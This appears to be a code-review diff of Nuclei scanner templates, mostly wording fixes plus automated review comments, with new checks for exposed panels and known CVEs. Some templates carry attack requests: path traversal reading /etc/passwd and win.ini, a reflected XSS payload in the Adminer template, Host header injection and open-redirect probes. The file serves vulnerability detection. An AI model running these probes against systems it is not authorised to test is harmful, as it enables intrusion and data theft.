name: Django SQL Injection
description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious SQL.
description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL.
reference:
- https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402
- https://docs.djangoproject.com/en/3.0/releases/security/

View File

@ -3,7 +3,7 @@ info:
name: rConfig Unauthenticated Sensitive Information Disclosure
author: madrobot
severity: high
description: An issue was discovered in includes/head.inc.php in rConfig before 3.9.4. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application was not exiting after a redirect is applied, the rest of the page still executed, resulting in the disclosure of cleartext credentials in the response.
description: An issue was discovered in includes/head.inc.php in rConfig before 3.9.4. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executed, resulting in the disclosure of cleartext credentials in the response.
reference:
- https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153
- https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9
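Review bot: tense mismatch in the new wording: `Because the application does not exit ... the rest of the page still executed`; make it `still executes`. The description names `includes/head.inc.php` but the request goes to `settings.php`; one clause saying head.inc.php is included by settings.php would connect the two.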

View File

@ -0,0 +1,29 @@
id: CVE-2021-20114
info:
name: TCExam <= 14.8.1 Exposure of Sensitive Information to an Unauthorized Actor
author: push4d
severity: high
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which included sensitive database backup files.
reference:
- https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true
- https://nvd.nist.gov/vuln/detail/CVE-2021-20114
tags: cve,cve2021,tcexam,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/cache/backup/"
matchers-condition: and
matchers:
- type: word
words:
- "Index of /cache/backup"
- "Parent Directory"
- ".sql.gz"
condition: and
- type: status
status:
- 200
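Review bot: the matcher requires `Parent Directory`, which is Apache mod_autoindex wording; nginx autoindex prints `../` instead, so a TCExam install behind nginx with the same exposed `/cache/backup/` listing is missed. Either drop `Parent Directory` and keep `Index of /cache/backup` plus `.sql.gz` (both appear in Apache and nginx listings), or add a second matcher for the nginx form.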

View File

@ -5,7 +5,7 @@ info:
author: dwisiswant0
severity: critical
reference: https://swarm.ptsecurity.com/unauth-rce-vmware/
description: The vulnerability allows unauthenticated remote attackers to upload file leading to remote code execution (RCE). This templates only detects the plugin.
description: The vulnerability allows unauthenticated remote attackers to upload files leading to remote code execution (RCE). This templates only detects the plugin.
tags: cve,cve2021,vmware,rce
requests:
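Review bot: `This templates only detects the plugin` is still ungrammatical after the edit (`This template`), and as with the WP File Manager template in this commit, a presence-only check carrying `severity: critical` will page people for installs that are already patched; either verify the vulnerable endpoint's response or lower the severity.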

View File

@ -4,7 +4,7 @@ info:
name: VICIdial - Multiple sensitive Information disclosure
author: pdteam
severity: high
description: VICIdial's Web Client contains many sensitive files that can be access from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/21
description: VICIdial's Web Client contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/2021.
reference: https://github.com/JHHAX/VICIdial
tags: cve,cve2021
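Review bot: the new description still has "IP's" (should be "IPs") and the date "20/5/2021" is ambiguous across locales; an ISO date (2021-05-20) is safer. The `tags` line also carries no product tag, so `vicidial` would help when running templates by tag.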

View File

@ -0,0 +1,32 @@
id: CVE-2021-29625
info:
name: Adminer reflected XSS via the table parameter
author: daffainfo
description: Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer versions 4.6.1 to 4.8.0 affects users of MySQL, MariaDB, PgSQL and SQLite. XSS is in most cases prevented by strict CSP in all modern browsers. The only exception is when Adminer is using a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled). In browsers without CSP, Adminer versions 4.6.1 to 4.8.0 are affected. The vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`).
severity: medium
reference:
- https://sourceforge.net/p/adminer/bugs-and-features/797/
- https://www.cvedetails.com/cve/CVE-2021-29625/
tags: cve,cve2021,adminer,xss
requests:
- method: GET
path:
- '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200
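Review bot: the `reference` list cites cvedetails rather than the NVD entry; other CVE templates in this diff link https://nvd.nist.gov/vuln/detail/CVE-... and this one should follow the same convention. The rest of the template is consistent: reflection check on the body, `text/html` content type and status 200 all required by `matchers-condition: and`.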

View File

@ -3,7 +3,7 @@ id: CVE-2021-33221
info:
name: CommScope Ruckus IoT Controller Unauthenticated Service Details
author: geeknik
description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices uses for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens).
description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens).
reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
severity: medium
tags: cve,cve2021,commscope,ruckus,debug

View File

@ -6,6 +6,8 @@ info:
severity: medium
reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
tags: hiawatha,iot,default-login
additional-fields:
shodan-dork: https://www.shodan.io/search?query=html%3A%22CS141%22
requests:
- raw:

View File

@ -4,7 +4,7 @@ info:
author: andysvints
severity: high
tags: glpi,default-login
description: GLPI is an ITSM software tool that helps you plan and manage IT changes. Checking is default super admin account(glpi/glpi) is enabled.
description: GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled.
reference: https://glpi-project.org/
requests:

View File

@ -4,7 +4,7 @@ info:
name: E-mail service detector
author: binaryfigments
severity: info
description: Check the email service or spamfilter that is used for a domain.
description: Check the email service or spam filter that is used for a domain.
tags: dns
dns:

View File

@ -0,0 +1,23 @@
id: strapi-panel
info:
name: Strapi Login Panel
author: idealphase
severity: info
tags: panel,strapi
requests:
- method: GET
path:
- '{{BaseURL}}/admin/auth/login'
matchers-condition: and
matchers:
- type: word
words:
- "<title>Strapi Admin</title>"
- type: status
status:
- 200
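Review bot: the `info` block has no `description` or `reference`; a one-line description of what the `/admin/auth/login` check detects would make triage of results easier, as the other panel templates in this diff provide.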

View File

@ -0,0 +1,25 @@
id: watchguard-panel
info:
name: Watchguard Panel
author: ahmetpergamum
severity: info
reference: https://www.exploit-db.com/ghdb/7008
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}/sslvpn_logon.shtml'
matchers-condition: and
matchers:
- type: word
words:
- '<title>User Authentication'
- 'WatchGuard Technologies'
condition: or
- type: status
status:
- 200
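Review bot: with `condition: or`, the generic string `<title>User Authentication` alone is enough to match, which can flag non-WatchGuard login pages served at the same path; consider `condition: and` or keeping only the vendor string. The `tags` line could also carry `watchguard` alongside `panel`, as other panel templates tag the product.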

View File

@ -4,7 +4,7 @@ info:
name: yarn lock file disclosure
author: oppsec
severity: info
description: yarn.lock is a file which store all exactly versions of each dependency were installed.
description: The yarn.lock file stores the versions of each Yarn dependency installed.
tags: exposure
requests:

View File

@ -3,7 +3,7 @@ info:
name: iis-shortname
author: nodauf
severity: info
description: If IIS use old .Net Framwork it's possible to enumeration folder with the symbol ~.
description: When IIS uses an old .Net Framwork it's possible to enumeration folder with the symbol ~.
tags: fuzz
reference:
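Review bot: the new description keeps the typo "Framwork" and the ungrammatical "it's possible to enumeration folder"; suggest "When IIS uses an old .NET Framework it is possible to enumerate folders using the ~ symbol."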

View File

@ -2,7 +2,7 @@ id: kevinlab-device-detect
info:
name: KevinLAB Devices Detection
description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control.
description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings by collecting and analyzing various information of energy usage and facilities as well as efficiency and indoor environment control.
author: gy741
severity: info
tags: iot

View File

@ -4,7 +4,7 @@ info:
name: XP Webcam Viewer Page
author: aashiq
severity: medium
description: Searches for exposed webcams by querying the /mobile.html endpoint and existance of webcamXP in the body
description: Searches for exposed webcams by querying the /mobile.html endpoint and the existence of webcamXP in the body.
tags: webcam,iot
requests:
@ -23,4 +23,4 @@ requests:
words:
- "Please provide a valid username/password to access this server."
part: body
negative: true
negative: true

View File

@ -3,7 +3,7 @@ id: google-floc-disabled
info:
name: Google FLoC Disabled
author: geeknik
description: The detected website has decided to explicity exclude itself from Google FLoC tracking.
description: The detected website has decided to explicilty exclude itself from Google FLoC tracking.
reference: https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/
severity: info
tags: google,floc,misc
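Review bot: the replacement line introduces a new typo, "explicilty" (the old line had "explicity"); the word should be "explicitly".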

View File

@ -4,8 +4,8 @@ info:
name: Joomla htaccess file disclosure
author: oppsec
severity: info
description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc...
tags: misc
description: Joomla has an htaccess file to store configurations about HTTP config, directory listing, etc.
tags: misc,joomla
requests:
- method: GET

View File

@ -4,8 +4,8 @@ info:
name: Joomla manifest file disclosure
author: oppsec
severity: info
description: joomla.xml is a xml file which stores some informations about installed Joomla, like version, files and paths.
tags: misc
description: joomla.xml is a file which stores information about installed Joomla, such as version, files, and paths.
tags: misc,joomla
requests:
- method: GET

View File

@ -4,7 +4,7 @@ info:
name: Moodle Changelog File
author: oppsec
severity: info
description: Moodle have a file which describes API changes in core libraries and APIs, can be used to discover Moodle version.
description: Moodle has a file which describes API changes in core libraries and APIs, and can be used to discover Moodle version.
tags: misc
requests:

View File

@ -5,17 +5,21 @@ info:
author: Dheerajmadhukar
severity: critical
description: Groovy console is exposed, RCE is possible.
reference: https://hackerone.com/reports/672243
reference:
- https://hackerone.com/reports/672243
- https://twitter.com/XHackerx007/status/1435139576314671105
tags: aem
requests:
- method: GET
path:
- "{{BaseURL}}/groovyconsole"
- "{{BaseURL}}/etc/groovyconsole.html"
headers:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9,hi;q=0.8
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
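Review bot: the added `Accept` and `Accept-Language` headers (including `hi;q=0.8`) look copied from a browser capture and are not needed for a detection-only request; drop them unless the endpoint actually requires them, since fixed browser-like headers add noise to the template and to target logs. The added `stop-at-first-match: true` with two paths is fine, as either path confirms the same console.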
@ -25,6 +29,7 @@ requests:
- "Groovy Web Console"
part: body
condition: and
- type: status
status:
- 200

View File

@ -4,7 +4,7 @@ info:
author: DhiyaneshDk
name: AEM UserInfo Servlet
severity: info
description: UserInfoServlet is exposed, it allows to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.
description: UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.
tags: aem
@ -28,4 +28,4 @@ requests:
- type: word
part: header
words:
- 'application/json'
- 'application/json'

View File

@ -4,7 +4,7 @@ info:
name: ITMS-Misconfigured
author: dhiyaneshDK
severity: info
description: detectes misconfigured Service-now ITSM instances
description: Detection of misconfigured ServiceNow ITSM instances.
reference:
- https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
- https://github.com/leo-hildegarde/SnowDownKB/
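Review bot: the `name` field still reads "ITMS-Misconfigured" while the rewritten description says "ServiceNow ITSM instances"; the name should be corrected to ITSM (and a descriptive form such as "ServiceNow ITSM Misconfigured" would match the style of the other templates).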
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -4,7 +4,7 @@ info:
name: HTTP Missing Security Headers
author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki
severity: info
description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty.
description: It searches for missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty.
tags: misconfig,generic
requests:
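Review bot: the rewritten description still reads awkwardly ("could be so less generic and could be useless for Bug Bounty"); suggest "Checks for missing HTTP security headers. This is a generic check and the findings are often low value for bug bounty purposes."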
@ -124,4 +124,4 @@ requests:
- type: regex
name: access-control-allow-headers
regex:
- "(?i)access-control-allow-headers"
- "(?i)access-control-allow-headers"

View File

@ -2,7 +2,7 @@ id: laravel-debug-enabled
info:
name: Laravel Debug Enabled
author: notsoevilweasel
description: Laravel with APP_DEBUG set to true prone to showing verbose errors.
description: Laravel with APP_DEBUG set to true is prone to show verbose errors.
severity: medium
tags: debug,laravel,misconfig
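Review bot: "is prone to show verbose errors" should be "is prone to showing verbose errors" in the new description line.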
@ -19,4 +19,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -0,0 +1,28 @@
id: nextcloud-install
info:
name: Nextcloud Exposed Installation
author: skeltavik
severity: high
tags: tech,nextcloud,storage
reference: https://docs.nextcloud.com/server/latest/admin_manual/installation/installation_wizard.html
requests:
- method: GET
path:
- '{{BaseURL}}'
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<fieldset id="adminaccount"><legend>Create an <strong>admin account</strong></legend>'
- '<legend><a id="showAdvanced" tabindex="0" href="#">Storage &amp; database'
condition: and
- type: status
status:
- 200
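Review bot: the template has no `description`, yet it is rated `high`; a sentence explaining that the matched page is the unauthenticated installation wizard, which offers to create the admin account (see the `adminaccount` fieldset in the first matcher), would justify the severity for readers of the output.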

View File

@ -5,7 +5,7 @@ info:
author: iamthefrogy
severity: medium
tags: network,ssh,openssh
description: SSHv1 is a deprecated and have known cryptographic issues.
description: SSHv1 is deprecated and has known cryptographic issues.
reference:
- https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473

View File

@ -5,7 +5,7 @@ info:
author: iamthefrogy
severity: info
tags: network,mysql,bruteforce,db
description: MySQL instance with enabled native password support prone vulnerable for password brute-force attack.
description: MySQL instance with enabled native password support is prone to password brute-force attacks.
network:
- host:

View File

@ -5,7 +5,7 @@ info:
author: iamthefrogy
severity: low
tags: network,openssh
description: OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities.
description: OpenSSH 5.3 is vulnerable to username enumeration and DoS vulnerabilities.
reference:
- http://seclists.org/fulldisclosure/2016/Jul/51
- https://security-tracker.debian.org/tracker/CVE-2016-6210

View File

@ -0,0 +1,24 @@
id: daybyday-detect
info:
name: DaybydayCRM Detect
author: pikpikcu
severity: info
tags: tech,daybyday
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Daybyday - Login</title>"
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: eg-manager-detect
info:
name: eG Manager Detect
author: pikpikcu
severity: info
tags: tech,eg
requests:
- method: GET
path:
- "{{BaseURL}}/final/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title> eG Innovations, Inc.</title>"
- "eG Innovations, Inc. All Rights Reserved"
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: iplanet-web-server
info:
name: Detect iPlanet Webserver Detection
author: pussycat0x
severity: info
tags: tech
additional-fields:
fofa-dork: 'app="iPlanet-Web-Server,-Enterprise-Edition-4.1"'
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "iPlanet"
- type: status
status:
- 200
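Review bot: the `name` "Detect iPlanet Webserver Detection" is redundant; "iPlanet Web Server Detection" reads better. The single body word `iPlanet` is also a weak fingerprint, since any page mentioning the product will match; a `Server` response header check or a more specific body string would reduce false positives.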

View File

@ -0,0 +1,25 @@
id: nextcloud-detect
info:
name: Nextcloud Detect
author: skeltavik
severity: info
description: Detects Nextcloud
tags: tech,nextcloud,storage
reference: https://nextcloud.com
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/login'
- '{{BaseURL}}/nextcloud/index.php/login'
stop-at-first-match: true
redirects: true
max-redirects: 2
matchers:
- type: word
part: body
words:
- 'var nc_lastLogin'

View File

@ -0,0 +1,32 @@
id: host-header-injection
info:
name: Host Header Injection
author: princechaddha
severity: info
description: HTTP header injection is a general class of web application security vulnerability which occurs when Hypertext Transfer Protocol headers are dynamically generated based on user input.
reference:
- https://portswigger.net/web-security/host-header
- https://portswigger.net/web-security/host-header/exploiting
- https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/
tags: hostheader-injection,generic
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
Host: "{{randstr}}.tld"
matchers-condition: and
matchers:
- type: word
words:
- '{{randstr}}.tld'
part: body
condition: and
- type: status
status:
- 200
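Review bot: the description talks about HTTP header injection in general, but the template actually checks whether a supplied `Host` value is reflected in the response body; the description should say so, and note that reflection alone (e.g. in canonical links) is why the severity is `info`. The `condition: and` on a single-word matcher is redundant and can be removed.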

View File

@ -4,7 +4,7 @@ info:
name: Open URL redirect detection
author: afaq,melbadry9,Elmahdi,pxmme1337,Regala_,andirrahmani1,geeknik
severity: low
description: A user-controlled input redirect users to an external website.
description: A user-controlled input redirects users to an external website.
tags: redirect,generic
requests:

View File

@ -4,7 +4,7 @@ info:
name: CouchDB Admin Party
author: organiccrap
severity: high
description: Requests made against CouchDB is done in the context of an admin user.
description: Requests made against CouchDB are done in the context of an admin user.
tags: couchdb
requests:

View File

@ -4,7 +4,7 @@ info:
name: EyeLock nano NXT 3.5 - Local File Disclosure
author: geeknik
severity: high
description: nano NXT suffers from a file disclosure vulnerability when input passed thru the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.
description: nano NXT suffers from a file disclosure vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.
reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt
tags: iot,lfi,eyelock

View File

@ -0,0 +1,28 @@
id: gsoap-lfi
info:
name: gSOAP 2.8 - Directory Traversal
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/47653
tags: gsoap,lfi
requests:
- raw:
- |
GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
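Review bot: the raw request carries a browser-style `Accept` and a `tr-TR` `Accept-Language` header that are irrelevant to the check and should be dropped. Also verify that the request line with `../` segments is sent literally, since standard HTTP clients normalize dot segments before sending and the template would then silently test `/etc/passwd` at the root instead.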

View File

@ -0,0 +1,19 @@
id: homeautomation-v3-openredirect
info:
name: HomeAutomation v3.3.2 Open Redirect
author: 0x_Akoko
severity: medium
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php
tags: iot,redirect
requests:
- method: GET
path:
- "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header

View File

@ -4,7 +4,7 @@ info:
name: KevinLAB BEMS (Building Energy Management System) Undocumented Backdoor Account
author: gy741
severity: critical
description: The BEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.
description: The BEMS solution has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
tags: kevinlab

View File

@ -4,7 +4,7 @@ info:
name: KevinLAB HEMS Undocumented Backdoor Account
author: gy741
severity: critical
description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely.
description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely.
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
tags: kevinlab,default-login,backdoor
@ -38,4 +38,4 @@ requests:
- type: word
words:
- 'PHPSESSID'
part: header
part: header

View File

@ -0,0 +1,27 @@
id: minimouse-lfi
info:
name: Mini Mouse 9.2.0 - Path Traversal
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/49744
tags: minimouse,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/file=C:%5CWindows%5Cwin.ini"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body
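Review bot: the path `/file=C:%5CWindows%5Cwin.ini` has no `?` separating a query parameter, so `file=...` is sent as a path segment; confirm against the referenced exploit-db entry that this is the intended form rather than `/?file=`. The `win.ini` keyword set with `condition: and` is a reasonable confirmation.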

View File

@ -4,7 +4,7 @@ info:
name: NETGEAR DGN2200v1 Router Authentication Bypass
author: gy741
severity: high
description: NETGEAR decided to use to check if a page has “.jpg”, “.gif” or “ess_” substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like “?.gif”).
description: NETGEAR DGN2200v1 Router does not require authentication if a page has “.jpg”, “.gif”, or “ess_” substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., “?.gif”).
reference:
- https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
- https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1
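Review bot: the rewritten description is still hard to parse ("...substrings, however matches the entire URL"); suggest "The DGN2200v1 web server skips authentication for any request whose URL contains the substrings “.jpg”, “.gif” or “ess_”, and the check is applied to the entire URL, so ...".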

View File

@ -0,0 +1,27 @@
id: openvpn-hhi
info:
name: OpenVPN Host Header Injection
author: twitter.com/Dheerajmadhukar
severity: info
tags: openvpn,hostheader-injection
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{randstr}}.tld
matchers-condition: and
matchers:
- type: word
words:
- "https://{{randstr}}.tld/__session_start__/"
- "openvpn_sess"
part: header
condition: and
- type: status
status:
- 302
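Review bot: the `author` field is a Twitter URL (`twitter.com/Dheerajmadhukar`) while the rest of the repository uses a bare handle (see `author: Dheerajmadhukar` in the AEM Groovy template in this same diff); use the handle for consistency with the statistics table.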

View File

@ -4,7 +4,7 @@ info:
name: sar2html 3.2.1 - 'plot' Remote Code Execution
author: gy741
severity: critical
description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a commend injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
reference:
- https://www.exploit-db.com/exploits/49344
tags: sar2html,rce,oob

View File

@ -4,7 +4,7 @@ info:
name: Spring Boot Actuators (Jolokia) XXE
author: dwisiswant0,ipanda
severity: high
description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine.
description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine.
reference:
- https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
- https://github.com/mpgn/Spring-Boot-Actuator-Exploit
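Review bot: "Actuators's" survives in the new description line; it should be "Actuator's".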
@ -31,4 +31,4 @@ requests:
- type: word
words:
- "X-Application-Context"
part: header
part: header

View File

@ -3,11 +3,11 @@ id: azkaban-workflow
info:
name: Azkaban Security Checks
author: pdteam
description: A simple workflow that runs all azkaban related nuclei templates on a given target.
description: A simple workflow that runs all Azkaban related nuclei templates on a given target.
tags: workflow
workflows:
- template: exposed-panels/azkaban-web-client.yaml
subtemplates:
- template: default-logins/azkaban/azkaban-web-client-default-creds.yaml
- template: default-logins/azkaban/azkaban-web-client-default-creds.yaml

View File

@ -3,7 +3,7 @@ id: bigip-workflow
info:
name: F5 BIG-IP Security Checks
author: dwisiswant0
description: A simple workflow that runs all Bigip related nuclei templates on a given target.
description: A simple workflow that runs all BigIP related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
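Review bot: the new description spells the product "BigIP" while the `name` line uses "F5 BIG-IP"; use "BIG-IP" in both.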
@ -14,4 +14,4 @@ workflows:
- template: technologies/bigip-config-utility-detect.yaml
subtemplates:
- template: cves/2020/CVE-2020-5902.yaml
- template: cves/2020/CVE-2020-5902.yaml

View File

@ -3,10 +3,10 @@ id: lucee-workflow
info:
name: Lucee Detection Workflow
author: geeknik,dhiyaneshDk
description: A simple workflow that runs all Lucee related nuclei templates on given target.
description: A simple workflow that runs all Lucee related nuclei templates on a given target.
tags: workflow
workflows:
- template: technologies/lucee-detect.yaml
subtemplates:
- tags: lucee
- tags: lucee

View File

@ -1,9 +1,9 @@
id: springboot-workflow
info:
name: Springboot Security Checks
name: Spring Boot Security Checks
author: dwisiswant0
description: A simple workflow that runs all springboot related nuclei templates on a given target.
description: A simple workflow that runs all Spring Boot related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
@ -13,4 +13,4 @@ workflows:
- template: technologies/springboot-actuator.yaml
subtemplates:
- tags: springboot
- tags: springboot

View File

@ -3,10 +3,10 @@ id: worksite-takeover-workflow
info:
name: Worksite Takeover Workflow
author: pdteam
description: A simple workflow that runs DNS based detection to filter hosts runnng worksite and do further HTTP based check to confirm takeover.
description: A simple workflow that runs DNS based detection to filter hosts running Worksite and do further HTTP based check to confirm takeover.
reference: https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites
workflows:
- template: dns/worksites-detection.yaml
subtemplates:
- template: takeovers/worksites-takeover.yaml
- template: takeovers/worksites-takeover.yaml
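Review bot: the new description still has a grammar problem ("and do further HTTP based check"); suggest "...to filter hosts running Worksite and then runs a further HTTP-based check to confirm the takeover."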